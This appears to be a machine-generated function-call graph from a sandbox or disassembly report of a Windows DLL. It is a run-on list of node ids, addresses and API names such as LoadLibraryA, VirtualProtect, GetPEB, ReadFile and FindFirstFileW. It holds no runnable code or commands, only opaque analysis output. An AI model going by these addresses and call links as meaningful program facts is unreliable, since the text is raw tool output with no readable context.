_memset 18939->18950 18941 6fe35348 __fptostr 61 API calls 18940->18941 18942 6fe3b434 18941->18942 18943 6fe3815c __fptostr 6 API calls 18942->18943 18945 6fe3b444 ___DllMainCRTStartup 18943->18945 18944 6fe3b4c0 RtlAllocateHeap 18944->18950 18945->18916 18946 6fe3c08e _malloc 6 API calls 18946->18950 18947 6fe3a914 __lock 61 API calls 18947->18950 18948 6fe3b126 ___sbh_alloc_block 5 API calls 18948->18950 18950->18944 18950->18945 18950->18946 18950->18947 18950->18948 18951 6fe3b507 18950->18951 18954 6fe3a83a LeaveCriticalSection 18951->18954 18953 6fe3b50e 18953->18950 18954->18953 18955->18922 18974 6fe3a83a LeaveCriticalSection 18956->18974 18958 6fe3a1b6 18958->18932 18960 6fe40435 18959->18960 18961 6fe40432 InterlockedIncrement 18959->18961 18962 6fe40442 18960->18962 18963 6fe4043f InterlockedIncrement 18960->18963 18961->18960 18964 6fe4044c InterlockedIncrement 18962->18964 18965 6fe4044f 18962->18965 18963->18962 18964->18965 18966 6fe40459 InterlockedIncrement 18965->18966 18968 6fe4045c 18965->18968 18966->18968 18967 6fe40475 InterlockedIncrement 18967->18968 18968->18967 18969 6fe40485 InterlockedIncrement 18968->18969 18970 6fe40490 InterlockedIncrement 18968->18970 18969->18968 18970->18935 18975 6fe3a83a LeaveCriticalSection 18971->18975 18973 6fe3a204 18973->18937 18974->18958 18975->18973 18977 6fe214b6 18976->18977 18978 6fe214ac ctype 18976->18978 18979 6fe214ed 18977->18979 18986 6fe213f0 18977->18986 18978->18482 18981 6fe2150a 18979->18981 18982 6fe214fd 18979->18982 19003 6fe33f43 18981->19003 18991 6fe33fc0 18982->18991 18985 6fe21508 18985->18482 18987 6fe21330 ctype 18986->18987 18988 6fe213b0 ctype 18987->18988 18989 6fe33f43 _memcpy_s 62 API calls 18987->18989 18988->18979 18990 6fe2137d 18989->18990 18990->18979 18992 6fe33fd0 18991->18992 18993 6fe33fe9 18991->18993 18994 6fe33fd5 18992->18994 18996 6fe33ff5 18992->18996 18993->18985 18995 6fe35348 __fptostr 62 API calls 18994->18995 18997 6fe33fda 18995->18997 18998 6fe33ffa 18996->18998 18999 6fe34008 18996->18999 19002 6fe3815c __fptostr 6 API calls 18997->19002 19000 6fe35348 __fptostr 62 API calls 18998->19000 19012 6fe38190 18999->19012 19000->18997 19002->18993 19006 6fe33f57 _memset 19003->19006 19008 6fe33f53 ___crtGetEnvironmentStringsA 19003->19008 19004 6fe33f5c 19005 6fe35348 __fptostr 62 API calls 19004->19005 19007 6fe33f61 19005->19007 19006->19004 19006->19008 19009 6fe33fa6 19006->19009 19010 6fe3815c __fptostr 6 API calls 19007->19010 19008->18985 19009->19008 19011 6fe35348 __fptostr 62 API calls 19009->19011 19010->19008 19011->19007 19013 6fe381a8 19012->19013 19014 6fe381cf __VEC_memcpy 19013->19014 19015 6fe381d7 19013->19015 19014->19015 19015->18993 19023 6fe33d7f 19016->19023 19017 6fe26dc1 ctype 2 API calls 19017->19023 19018 6fe33d92 19078 6fe26911 19018->19078 19020 6fe33dad 19021 6fe268e2 ctype 62 API calls 19020->19021 19022 6fe33d9a _memset 19021->19022 19022->18504 19023->19017 19023->19018 19023->19020 19023->19022 19024 6fe33e3c 19023->19024 19025 6fe268e2 ctype 62 API calls 19024->19025 19026 6fe33e45 19025->19026 19084 6fe25ac0 19026->19084 19028 6fe33e5e _memset 19029 6fe26911 ctype 63 API calls 19028->19029 19029->19022 19031 6fe25cd6 19030->19031 19087 6fe2afc3 19031->19087 19033 6fe25d57 19034 6fe2afc3 65 API calls 19033->19034 19035 6fe25d61 19034->19035 19101 6fe264e0 19035->19101 19038 6fe25eba GlobalAlloc 19041 6fe25f12 19038->19041 19039 6fe25d97 19039->19038 19040 6fe267c3 19039->19040 19040->18504 19041->19041 19043 6fe2b201 19042->19043 19044 6fe2b1fc 19042->19044 19045 6fe2b211 19043->19045 19047 6fe33d6c 65 API calls 19043->19047 19046 6fe26dc1 ctype 2 API calls 19044->19046 19045->18504 19046->19043 19047->19045 19048->19048 19051 6fe25e40 19048->19051 19049 6fe267c3 19049->18506 19050 6fe25eba GlobalAlloc 19052 6fe25f12 19050->19052 19051->19048 19051->19049 19051->19050 19051->19051 19056 6fe26250 19053->19056 19054 6fe262f3 ReadFile 19054->19056 19057 6fe261f0 19054->19057 19055 6fe266d2 19056->19054 19056->19055 19057->18506 19061 6fe25de6 19058->19061 19059 6fe25eba GlobalAlloc 19062 6fe25f12 19059->19062 19060 6fe261d2 19060->18506 19061->19059 19061->19060 19069 6fe263fe 19063->19069 19064 6fe266f0 19065 6fe265f3 LoadLibraryA VirtualProtect 19066 6fe267f8 19065->19066 19067 6fe26649 VirtualProtect 19066->19067 19068 6fe26663 19067->19068 19068->18506 19069->19064 19069->19065 19071 6fe352b0 RaiseException 19070->19071 19072 6fe352a4 19070->19072 19071->18496 19072->19071 19074 6fe3527b __CxxThrowException@8 RaiseException 19073->19074 19075 6fe26ddc __EH_prolog3 19074->19075 19109 6fe2ba28 LocalAlloc 19075->19109 19077 6fe26df3 ctype 19077->18493 19079 6fe34618 ___DllMainCRTStartup 19078->19079 19080 6fe346a0 ___DllMainCRTStartup 19079->19080 19081 6fe34677 HeapFree 19079->19081 19080->19022 19081->19080 19082 6fe3468a 19081->19082 19083 6fe35348 __fptostr 62 API calls 19082->19083 19083->19080 19085 6fe33f43 _memcpy_s 62 API calls 19084->19085 19086 6fe25ad9 19085->19086 19086->19028 19092 6fe2afd6 19087->19092 19088 6fe26dc1 ctype 2 API calls 19088->19092 19089 6fe2afe9 19090 6fe26911 ctype 63 API calls 19089->19090 19094 6fe2aff1 _memset 19090->19094 19091 6fe2b009 19093 6fe268e2 ctype 62 API calls 19091->19093 19092->19088 19092->19089 19092->19091 19092->19094 19095 6fe2b08c 19092->19095 19093->19094 19094->19033 19096 6fe268e2 ctype 62 API calls 19095->19096 19097 6fe2b094 19096->19097 19098 6fe25ac0 62 API calls 19097->19098 19099 6fe2b0a5 _memset 19098->19099 19100 6fe26911 ctype 63 API calls 19099->19100 19100->19094 19102 6fe264ea LoadLibraryA VirtualProtect 19101->19102 19107 6fe267f8 19102->19107 19106 6fe25d67 GetPEB 19106->19039 19108 6fe26649 VirtualProtect 19107->19108 19108->19106 19110 6fe2ba41 19109->19110 19111 6fe2ba3c 19109->19111 19110->19077 19113 6fe26d89 19111->19113 19114 6fe3527b __CxxThrowException@8 RaiseException 19113->19114 19115 6fe26da4 19114->19115 19117 6fe248be ctype 19116->19117 19118 6fe262d0 ReadFile 19117->19118 19119 6fe2492c 19118->19119 19120 6fe215f0 63 API calls 19119->19120 19121 6fe2493e 19120->19121 19179 6fe230e0 19121->19179 19123 6fe2496f 19126 6fe24a3d 19123->19126 19182 6fe23150 19123->19182 19127 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19126->19127 19129 6fe24aae 19127->19129 19128 6fe215f0 63 API calls 19130 6fe24996 19128->19130 19129->18518 19186 6fe25670 19130->19186 19132 6fe249d6 19133 6fe2afc3 65 API calls 19132->19133 19134 6fe249f9 ___crtGetEnvironmentStringsA 19133->19134 19134->19126 19135 6fe34618 __crtGetStringTypeA_stat 62 API calls 19134->19135 19135->19126 19138 6fe24b00 19136->19138 19389 6fe23720 19138->19389 19142 6fe2afc3 65 API calls 19143 6fe24e44 19142->19143 19144 6fe24e88 19143->19144 19148 6fe24e63 19143->19148 19145 6fe24e97 19144->19145 19146 6fe26dc1 ctype 2 API calls 19144->19146 19405 6fe257c0 19145->19405 19146->19145 19399 6fe2b0d5 19148->19399 19151 6fe2b0d5 65 API calls 19152 6fe24e86 ctype 19151->19152 19153 6fe24f2a 19152->19153 19154 6fe262d0 ReadFile 19153->19154 19155 6fe24f5b 19154->19155 19156 6fe215f0 63 API calls 19155->19156 19157 6fe24f6f 19156->19157 19426 6fe2afb3 19157->19426 19161 6fe266d2 19160->19161 19164 6fe2626d 19160->19164 19162 6fe262f3 ReadFile 19163 6fe261f0 19162->19163 19162->19164 19163->18533 19164->19161 19164->19162 19166 6fe254f7 19165->19166 19170 6fe254be 19165->19170 19167 6fe231f0 98 API calls 19166->19167 19166->19170 19168 6fe2551a 19167->19168 19169 6fe22600 96 API calls 19168->19169 19169->19170 19170->18533 19172 6fe24616 19171->19172 19173 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19172->19173 19174 6fe246ee 19173->19174 19174->18519 19176 6fe247f9 19175->19176 19177 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19176->19177 19178 6fe24873 19177->19178 19178->18529 19198 6fe22b50 19179->19198 19181 6fe230f2 _wcspbrk 19181->19123 19183 6fe2318b ctype 19182->19183 19184 6fe22600 96 API calls 19183->19184 19185 6fe231d7 19184->19185 19185->19128 19187 6fe25681 lstrlenW 19186->19187 19188 6fe2567b 19186->19188 19304 6fe25730 19187->19304 19188->19132 19191 6fe256c5 GetLastError 19193 6fe256d0 WideCharToMultiByte 19191->19193 19194 6fe25716 19191->19194 19192 6fe2571f 19192->19132 19195 6fe25730 72 API calls 19193->19195 19194->19192 19312 6fe25b00 GetLastError 19194->19312 19197 6fe256f4 WideCharToMultiByte 19195->19197 19197->19194 19199 6fe22b7e ctype 19198->19199 19200 6fe22bd1 19199->19200 19201 6fe22bb9 19199->19201 19202 6fe214a0 ctype 63 API calls 19200->19202 19205 6fe2a58c 19201->19205 19204 6fe22bc2 19202->19204 19204->19181 19208 6fe2aef1 19205->19208 19207 6fe2a591 19207->19204 19213 6fe2c050 19208->19213 19210 6fe2af23 19210->19207 19212 6fe2af00 19212->19210 19224 6fe2bb0c 19212->19224 19215 6fe2c05c __EH_prolog3 19213->19215 19214 6fe26dc1 ctype 2 API calls 19214->19215 19215->19214 19216 6fe2c0aa 19215->19216 19230 6fe2bd66 TlsAlloc 19215->19230 19234 6fe2bc4e EnterCriticalSection 19215->19234 19248 6fe2ba5b EnterCriticalSection 19216->19248 19221 6fe2c0d0 ctype 19221->19212 19222 6fe2c0bd 19255 6fe2be0d 19222->19255 19225 6fe2bb18 __EH_prolog3_catch 19224->19225 19226 6fe2bb41 ctype 19225->19226 19287 6fe2c220 19225->19287 19226->19212 19228 6fe2bb27 19297 6fe2c292 19228->19297 19231 6fe2bd92 19230->19231 19232 6fe2bd97 InitializeCriticalSection 19230->19232 19233 6fe26d89 ctype RaiseException 19231->19233 19232->19215 19233->19232 19235 6fe2bc71 19234->19235 19237 6fe2bcaa ctype 19235->19237 19238 6fe2bcbf GlobalHandle GlobalUnlock 19235->19238 19246 6fe2bd30 _memset 19235->19246 19236 6fe2bd47 LeaveCriticalSection 19236->19215 19240 6fe2bcb2 GlobalAlloc 19237->19240 19277 6fe269d7 19238->19277 19242 6fe2bce9 19240->19242 19241 6fe2bcdd GlobalReAlloc 19241->19242 19243 6fe2bd10 GlobalLock 19242->19243 19244 6fe2bd02 LeaveCriticalSection 19242->19244 19245 6fe2bcf4 GlobalHandle GlobalLock 19242->19245 19243->19246 19247 6fe26d89 ctype RaiseException 19244->19247 19245->19244 19246->19236 19247->19243 19249 6fe2ba76 19248->19249 19250 6fe2ba9d LeaveCriticalSection 19248->19250 19249->19250 19251 6fe2ba7b TlsGetValue 19249->19251 19252 6fe2baa6 19250->19252 19251->19250 19253 6fe2ba87 19251->19253 19252->19221 19252->19222 19253->19250 19254 6fe2ba8c LeaveCriticalSection 19253->19254 19254->19252 19279 6fe350fc 19255->19279 19257 6fe2be19 EnterCriticalSection 19258 6fe2be38 19257->19258 19263 6fe2bf1c LeaveCriticalSection 19257->19263 19260 6fe2be41 TlsGetValue 19258->19260 19258->19263 19261 6fe2be7f 19260->19261 19271 6fe2be4f 19260->19271 19264 6fe2ba28 ctype 2 API calls 19261->19264 19262 6fe2bf3f ctype 19262->19221 19263->19262 19265 6fe2be89 19264->19265 19280 6fe2bbbf 19265->19280 19266 6fe2bec4 ctype 19269 6fe2bed0 LocalReAlloc 19266->19269 19267 6fe2be69 ctype 19270 6fe2be73 LocalAlloc 19267->19270 19272 6fe2bedc 19269->19272 19270->19272 19271->19263 19271->19266 19271->19267 19273 6fe2bee0 LeaveCriticalSection 19272->19273 19274 6fe2beee _memset 19272->19274 19275 6fe26d89 ctype RaiseException 19273->19275 19276 6fe2bf07 TlsSetValue 19274->19276 19275->19274 19276->19263 19278 6fe269ec ctype 19277->19278 19278->19241 19279->19257 19283 6fe2bba5 19280->19283 19284 6fe2bbb0 19283->19284 19285 6fe2bbb5 19283->19285 19286 6fe26dc1 ctype LocalAlloc RaiseException 19284->19286 19285->19271 19286->19285 19288 6fe2c230 19287->19288 19289 6fe2c235 19287->19289 19290 6fe26dc1 ctype 2 API calls 19288->19290 19291 6fe2c243 19289->19291 19301 6fe2c1b7 19289->19301 19290->19289 19293 6fe2c255 EnterCriticalSection 19291->19293 19294 6fe2c27f EnterCriticalSection 19291->19294 19295 6fe2c261 InitializeCriticalSection 19293->19295 19296 6fe2c274 LeaveCriticalSection 19293->19296 19294->19228 19295->19296 19296->19294 19298 6fe2c2a4 LeaveCriticalSection 19297->19298 19299 6fe2c29f 19297->19299 19298->19226 19300 6fe26dc1 ctype 2 API calls 19299->19300 19300->19298 19302 6fe2c1c0 InitializeCriticalSection 19301->19302 19303 6fe2c1d5 19301->19303 19302->19303 19303->19291 19305 6fe25734 19304->19305 19310 6fe25788 19305->19310 19311 6fe25771 19305->19311 19314 6fe346a6 19305->19314 19308 6fe34618 __crtGetStringTypeA_stat 62 API calls 19308->19310 19309 6fe2569f WideCharToMultiByte 19309->19191 19309->19192 19310->19309 19325 6fe34721 19310->19325 19311->19308 19311->19310 19313 6fe25b0a 19312->19313 19315 6fe346b5 19314->19315 19316 6fe346dd 19314->19316 19315->19316 19317 6fe346c1 19315->19317 19318 6fe346f2 19316->19318 19332 6fe37637 19316->19332 19319 6fe35348 __fptostr 62 API calls 19317->19319 19345 6fe34ac8 19318->19345 19322 6fe346c6 19319->19322 19323 6fe3815c __fptostr 6 API calls 19322->19323 19324 6fe346d6 _memset 19323->19324 19324->19311 19326 6fe3b40b __calloc_impl 62 API calls 19325->19326 19327 6fe3473b 19326->19327 19328 6fe34757 19327->19328 19329 6fe35348 __fptostr 62 API calls 19327->19329 19328->19310 19330 6fe3474e 19329->19330 19330->19328 19331 6fe35348 __fptostr 62 API calls 19330->19331 19331->19328 19333 6fe37643 ___DllMainCRTStartup 19332->19333 19334 6fe37653 19333->19334 19335 6fe37670 19333->19335 19336 6fe35348 __fptostr 62 API calls 19334->19336 19337 6fe376b1 HeapSize 19335->19337 19339 6fe3a914 __lock 62 API calls 19335->19339 19338 6fe37658 19336->19338 19341 6fe37668 ___DllMainCRTStartup 19337->19341 19340 6fe3815c __fptostr 6 API calls 19338->19340 19342 6fe37680 ___sbh_find_block 19339->19342 19340->19341 19341->19318 19381 6fe376d1 19342->19381 19346 6fe34ad4 ___DllMainCRTStartup 19345->19346 19347 6fe34adb 19346->19347 19348 6fe34ae9 19346->19348 19349 6fe349fe _malloc 62 API calls 19347->19349 19350 6fe34af0 19348->19350 19351 6fe34afc 19348->19351 19372 6fe34ae3 __dosmaperr ___DllMainCRTStartup 19349->19372 19352 6fe34618 __crtGetStringTypeA_stat 62 API calls 19350->19352 19357 6fe34c6e 19351->19357 19368 6fe34b09 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 19351->19368 19352->19372 19353 6fe34ca1 19355 6fe3c08e _malloc 6 API calls 19353->19355 19354 6fe34c73 HeapReAlloc 19354->19357 19354->19372 19358 6fe34ca7 19355->19358 19356 6fe3a914 __lock 62 API calls 19356->19368 19357->19353 19357->19354 19359 6fe34cc5 19357->19359 19361 6fe3c08e _malloc 6 API calls 19357->19361 19363 6fe34cbb 19357->19363 19360 6fe35348 __fptostr 62 API calls 19358->19360 19362 6fe35348 __fptostr 62 API calls 19359->19362 19359->19372 19360->19372 19361->19357 19364 6fe34cce GetLastError 19362->19364 19366 6fe35348 __fptostr 62 API calls 19363->19366 19364->19372 19379 6fe34c3c 19366->19379 19367 6fe34b94 HeapAlloc 19367->19368 19368->19353 19368->19356 19368->19367 19370 6fe34be9 HeapReAlloc 19368->19370 19371 6fe3b126 ___sbh_alloc_block 5 API calls 19368->19371 19368->19372 19373 6fe3c08e _malloc 6 API calls 19368->19373 19374 6fe34c54 19368->19374 19377 6fe34c37 19368->19377 19380 6fe3a977 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 19368->19380 19385 6fe34c0c 19368->19385 19369 6fe34c41 GetLastError 19369->19372 19370->19368 19371->19368 19372->19324 19373->19368 19374->19372 19375 6fe35348 __fptostr 62 API calls 19374->19375 19376 6fe34c61 19375->19376 19376->19364 19376->19372 19378 6fe35348 __fptostr 62 API calls 19377->19378 19378->19379 19379->19369 19379->19372 19380->19368 19384 6fe3a83a LeaveCriticalSection 19381->19384 19383 6fe376ac 19383->19337 19383->19341 19384->19383 19388 6fe3a83a LeaveCriticalSection 19385->19388 19387 6fe34c13 19387->19368 19388->19387 19390 6fe23756 19389->19390 19391 6fe2afc3 65 API calls 19390->19391 19392 6fe23769 19391->19392 19393 6fe260f0 CreateFileW 19392->19393 19395 6fe261de 19393->19395 19397 6fe25de6 19393->19397 19394 6fe25eba GlobalAlloc 19398 6fe25f12 19394->19398 19396 6fe24d7d 19396->19142 19397->19394 19397->19396 19400 6fe2b0e5 19399->19400 19404 6fe2b0ff 19399->19404 19401 6fe2afc3 65 API calls 19400->19401 19402 6fe2b0ef 19401->19402 19403 6fe25ac0 62 API calls 19402->19403 19403->19404 19404->19152 19406 6fe257f3 19405->19406 19407 6fe257f8 19405->19407 19408 6fe26dc1 ctype 2 API calls 19406->19408 19409 6fe25841 19407->19409 19411 6fe257fa 19407->19411 19408->19407 19410 6fe258bb 19409->19410 19416 6fe25848 _memset 19409->19416 19413 6fe25992 19410->19413 19418 6fe258c6 _memset 19410->19418 19412 6fe26911 ctype 63 API calls 19411->19412 19415 6fe24ea0 19411->19415 19412->19415 19414 6fe259d8 19413->19414 19417 6fe26dc1 ctype 2 API calls 19413->19417 19421 6fe25ac0 62 API calls 19414->19421 19415->19151 19416->19415 19420 6fe23720 65 API calls 19416->19420 19417->19414 19418->19415 19419 6fe23720 65 API calls 19418->19419 19419->19418 19420->19416 19422 6fe25a0d _memset 19421->19422 19423 6fe25a8e 19422->19423 19425 6fe23720 65 API calls 19422->19425 19424 6fe26911 ctype 63 API calls 19423->19424 19424->19415 19425->19422 19427 6fe26911 ctype 63 API calls 19426->19427 19428 6fe2504b 19427->19428 19428->18533 19431 6fe27696 ctype 19429->19431 19430 6fe27807 19432 6fe277fb 19430->19432 19493 6fe22330 19430->19493 19431->19430 19435 6fe276bd 19431->19435 19434 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19432->19434 19436 6fe27835 19434->19436 19450 6fe2748e 19435->19450 19436->18536 19527 6fe21440 19444->19527 19446 6fe27312 _memset 19447 6fe26a35 62 API calls 19446->19447 19448 6fe27329 PathStripToRootW 19447->19448 19449 6fe2733d 19448->19449 19449->18538 19451 6fe2749d __EH_prolog3_GS 19450->19451 19452 6fe26dc1 ctype 2 API calls 19451->19452 19453 6fe274c7 GetFullPathNameW 19451->19453 19452->19451 19454 6fe274e0 19453->19454 19455 6fe27505 19453->19455 19500 6fe26a35 19454->19500 19456 6fe27524 19455->19456 19457 6fe27509 19455->19457 19463 6fe272fd 63 API calls 19456->19463 19461 6fe22330 63 API calls 19457->19461 19473 6fe274fe ctype 19457->19473 19459 6fe274ef 19460 6fe2745f 64 API calls 19459->19460 19460->19473 19461->19473 19465 6fe27540 PathIsUNCW 19463->19465 19466 6fe27554 GetVolumeInformationW 19465->19466 19465->19473 19467 6fe27596 19466->19467 19468 6fe27577 19466->19468 19469 6fe275a6 19467->19469 19470 6fe2759f CharUpperW 19467->19470 19471 6fe2745f 64 API calls 19468->19471 19472 6fe275af FindFirstFileW 19469->19472 19469->19473 19470->19469 19471->19473 19472->19473 19474 6fe275c7 FindClose 19472->19474 19506 6fe351b5 19473->19506 19474->19468 19475 6fe275d7 19474->19475 19475->19468 19476 6fe275df lstrlenW 19475->19476 19477 6fe275fc 19476->19477 19478 6fe2762d 19476->19478 19503 6fe26ea0 19477->19503 19478->19473 19480 6fe22330 63 API calls 19478->19480 19480->19473 19494 6fe2233b 19493->19494 19497 6fe2234a 19493->19497 19495 6fe214a0 ctype 63 API calls 19494->19495 19496 6fe22344 19495->19496 19496->19432 19498 6fe214a0 ctype 63 API calls 19497->19498 19499 6fe22369 19498->19499 19499->19432 19509 6fe344cb 19500->19509 19502 6fe26a4b 19502->19459 19518 6fe351ed 19503->19518 19505 6fe26eb3 19505->19473 19507 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19506->19507 19508 6fe351bf 19507->19508 19508->19508 19510 6fe344dd 19509->19510 19512 6fe344e6 19510->19512 19514 6fe344e1 19510->19514 19516 6fe3452d 19510->19516 19511 6fe35348 __fptostr 62 API calls 19513 6fe344fd 19511->19513 19512->19502 19515 6fe3815c __fptostr 6 API calls 19513->19515 19514->19511 19514->19512 19515->19512 19516->19512 19517 6fe35348 __fptostr 62 API calls 19516->19517 19517->19513 19519 6fe35205 19518->19519 19520 6fe351fe 19518->19520 19521 6fe35348 __fptostr 62 API calls 19519->19521 19520->19519 19525 6fe35231 19520->19525 19522 6fe3520a 19521->19522 19523 6fe3815c __fptostr 6 API calls 19522->19523 19524 6fe35219 19523->19524 19524->19505 19525->19524 19526 6fe35348 __fptostr 62 API calls 19525->19526 19526->19522 19528 6fe21465 19527->19528 19529 6fe2145d 19527->19529 19528->19446 19530 6fe213f0 ctype 62 API calls 19529->19530 19530->19528 19532 6fe27bd6 ctype 19531->19532 19533 6fe27bea 19531->19533 19535 6fe27b85 19532->19535 19533->18545 19536 6fe27b91 __EH_prolog3 19535->19536 19537 6fe268e2 ctype 62 API calls 19536->19537 19538 6fe27b98 19537->19538 19539 6fe27bb5 19538->19539 19540 6fe22370 ctype 63 API calls 19538->19540 19541 6fe3527b __CxxThrowException@8 RaiseException 19539->19541 19540->19539 19542 6fe27bca ctype 19541->19542 19543 6fe27bea 19542->19543 19544 6fe27b85 ctype 64 API calls 19542->19544 19543->19533 19544->19543 19546 6fe21580 62 API calls 19545->19546 19547 6fe22f92 19546->19547 19548 6fe213f0 ctype 62 API calls 19547->19548 19550 6fe22fc2 __wcsrev 19547->19550 19548->19550 19549 6fe22fe0 _wcspbrk 19549->18549 19550->19549 19551 6fe22f60 62 API calls 19550->19551 19552 6fe2309f 19551->19552 19553 6fe230a7 19552->19553 19554 6fe230bc 19552->19554 19556 6fe23370 62 API calls 19553->19556 19555 6fe21580 62 API calls 19554->19555 19557 6fe230c7 19555->19557 19558 6fe230b8 19556->19558 19557->18549 19558->18549 19560 6fe23386 19559->19560 19561 6fe23391 19560->19561 19564 6fe233af ctype 19560->19564 19562 6fe21580 62 API calls 19561->19562 19563 6fe2339a 19562->19563 19563->18555 19572 6fe23680 19564->19572 19569 6fe2158f ctype 19567->19569 19568 6fe2159c 19568->18554 19569->19568 19570 6fe33f43 _memcpy_s 62 API calls 19569->19570 19571 6fe215e1 19570->19571 19571->18554 19573 6fe2368b ctype 19572->19573 19574 6fe33f43 _memcpy_s 62 API calls 19573->19574 19575 6fe233e6 19574->19575 19575->18555 19577 6fe2340e 19576->19577 19578 6fe2341f 19576->19578 19585 6fe228d0 LoadResource 19577->19585 19578->18561 19580 6fe23416 19580->19578 19581 6fe23447 19580->19581 19582 6fe213f0 ctype 62 API calls 19580->19582 19583 6fe33f43 _memcpy_s 62 API calls 19581->19583 19582->19581 19584 6fe2347e 19583->19584 19584->18561 19586 6fe228e6 19585->19586 19587 6fe228e9 LockResource 19585->19587 19586->19580 19588 6fe228f7 SizeofResource 19587->19588 19589 6fe2290a 19587->19589 19588->19589 19589->19580 19591 6fe2124c 19590->19591 19598 6fe34320 19591->19598 19594 6fe21286 19601 6fe341a0 19594->19601 19595 6fe213f0 ctype 62 API calls 19595->19594 19597 6fe21294 19597->18578 19604 6fe342c9 19598->19604 19610 6fe34115 19601->19610 19605 6fe342d9 19604->19605 19608 6fe21263 19604->19608 19606 6fe35348 __fptostr 62 API calls 19605->19606 19607 6fe342de 19606->19607 19609 6fe3815c __fptostr 6 API calls 19607->19609 19608->19594 19608->19595 19609->19608 19611 6fe34122 19610->19611 19612 6fe3413f 19610->19612 19613 6fe35348 __fptostr 62 API calls 19611->19613 19614 6fe3414c 19612->19614 19616 6fe34159 19612->19616 19615 6fe34127 19613->19615 19617 6fe35348 __fptostr 62 API calls 19614->19617 19618 6fe3815c __fptostr 6 API calls 19615->19618 19625 6fe3401d 19616->19625 19619 6fe34151 19617->19619 19623 6fe34137 19618->19623 19622 6fe3815c __fptostr 6 API calls 19619->19622 19622->19623 19623->19597 19624 6fe35348 __fptostr 62 API calls 19624->19619 19626 6fe3404d 19625->19626 19627 6fe3402d 19625->19627 19630 6fe3405d 19626->19630 19636 6fe3407d 19626->19636 19628 6fe35348 __fptostr 62 API calls 19627->19628 19629 6fe34032 19628->19629 19631 6fe3815c __fptostr 6 API calls 19629->19631 19632 6fe35348 __fptostr 62 API calls 19630->19632 19635 6fe34042 19631->19635 19633 6fe34062 19632->19633 19634 6fe3815c __fptostr 6 API calls 19633->19634 19634->19635 19635->19623 19635->19624 19636->19635 19638 6fe340c4 19636->19638 19640 6fe384f5 19636->19640 19638->19635 19639 6fe384f5 __flsbuf 96 API calls 19638->19639 19639->19635 19661 6fe3fbb6 19640->19661 19643 6fe38510 19645 6fe35348 __fptostr 62 API calls 19643->19645 19644 6fe38527 19646 6fe3852b 19644->19646 19649 6fe38538 __flswbuf 19644->19649 19647 6fe38515 19645->19647 19648 6fe35348 __fptostr 62 API calls 19646->19648 19647->19638 19648->19647 19649->19647 19657 6fe3858e 19649->19657 19660 6fe38599 19649->19660 19667 6fe3f99d 19649->19667 19650 6fe38628 19654 6fe3f878 __locking 96 API calls 19650->19654 19651 6fe385a8 19652 6fe385bf 19651->19652 19653 6fe385dc 19651->19653 19679 6fe3f878 19652->19679 19653->19647 19704 6fe3f02c 19653->19704 19654->19647 19657->19660 19676 6fe3f954 19657->19676 19660->19650 19660->19651 19662 6fe3fbc5 19661->19662 19664 6fe38505 19661->19664 19663 6fe35348 __fptostr 62 API calls 19662->19663 19665 6fe3fbca 19663->19665 19664->19643 19664->19644 19666 6fe3815c __fptostr 6 API calls 19665->19666 19666->19664 19668 6fe3f9aa 19667->19668 19669 6fe3f9b9 19667->19669 19670 6fe35348 __fptostr 62 API calls 19668->19670 19672 6fe35348 __fptostr 62 API calls 19669->19672 19674 6fe3f9dd 19669->19674 19671 6fe3f9af 19670->19671 19671->19657 19673 6fe3f9cd 19672->19673 19675 6fe3815c __fptostr 6 API calls 19673->19675 19674->19657 19675->19674 19677 6fe3a5c3 __malloc_crt 62 API calls 19676->19677 19678 6fe3f969 19677->19678 19678->19660 19680 6fe3f884 ___DllMainCRTStartup 19679->19680 19681 6fe3f8a7 19680->19681 19682 6fe3f88c 19680->19682 19684 6fe3f8b5 19681->19684 19688 6fe3f8f6 19681->19688 19736 6fe3535b 19682->19736 19686 6fe3535b __dosmaperr 62 API calls 19684->19686 19687 6fe3f8ba 19686->19687 19690 6fe35348 __fptostr 62 API calls 19687->19690 19739 6fe419c1 19688->19739 19689 6fe35348 __fptostr 62 API calls 19697 6fe3f899 ___DllMainCRTStartup 19689->19697 19692 6fe3f8c1 19690->19692 19694 6fe3815c __fptostr 6 API calls 19692->19694 19693 6fe3f8fc 19695 6fe3f909 19693->19695 19696 6fe3f91f 19693->19696 19694->19697 19749 6fe3f145 19695->19749 19699 6fe35348 __fptostr 62 API calls 19696->19699 19697->19647 19701 6fe3f924 19699->19701 19700 6fe3f917 19808 6fe3f94a 19700->19808 19702 6fe3535b __dosmaperr 62 API calls 19701->19702 19702->19700 19705 6fe3f038 ___DllMainCRTStartup 19704->19705 19706 6fe3f065 19705->19706 19707 6fe3f049 19705->19707 19709 6fe3f073 19706->19709 19711 6fe3f094 19706->19711 19708 6fe3535b __dosmaperr 62 API calls 19707->19708 19710 6fe3f04e 19708->19710 19712 6fe3535b __dosmaperr 62 API calls 19709->19712 19715 6fe35348 __fptostr 62 API calls 19710->19715 19713 6fe3f0b4 19711->19713 19714 6fe3f0da 19711->19714 19716 6fe3f078 19712->19716 19717 6fe3535b __dosmaperr 62 API calls 19713->19717 19718 6fe419c1 ___lock_fhandle 63 API calls 19714->19718 19729 6fe3f056 ___DllMainCRTStartup 19715->19729 19719 6fe35348 __fptostr 62 API calls 19716->19719 19721 6fe3f0b9 19717->19721 19722 6fe3f0e0 19718->19722 19720 6fe3f07f 19719->19720 19723 6fe3815c __fptostr 6 API calls 19720->19723 19724 6fe35348 __fptostr 62 API calls 19721->19724 19725 6fe3f109 19722->19725 19726 6fe3f0ed 19722->19726 19723->19729 19728 6fe3f0c0 19724->19728 19727 6fe35348 __fptostr 62 API calls 19725->19727 19730 6fe3efa7 __lseeki64_nolock 64 API calls 19726->19730 19732 6fe3f10e 19727->19732 19733 6fe3815c __fptostr 6 API calls 19728->19733 19729->19647 19731 6fe3f0fe 19730->19731 19855 6fe3f13b 19731->19855 19734 6fe3535b __dosmaperr 62 API calls 19732->19734 19733->19729 19734->19731 19737 6fe3a206 __getptd_noexit 62 API calls 19736->19737 19738 6fe35360 19737->19738 19738->19689 19740 6fe419cd ___DllMainCRTStartup 19739->19740 19741 6fe41a28 19740->19741 19744 6fe3a914 __lock 62 API calls 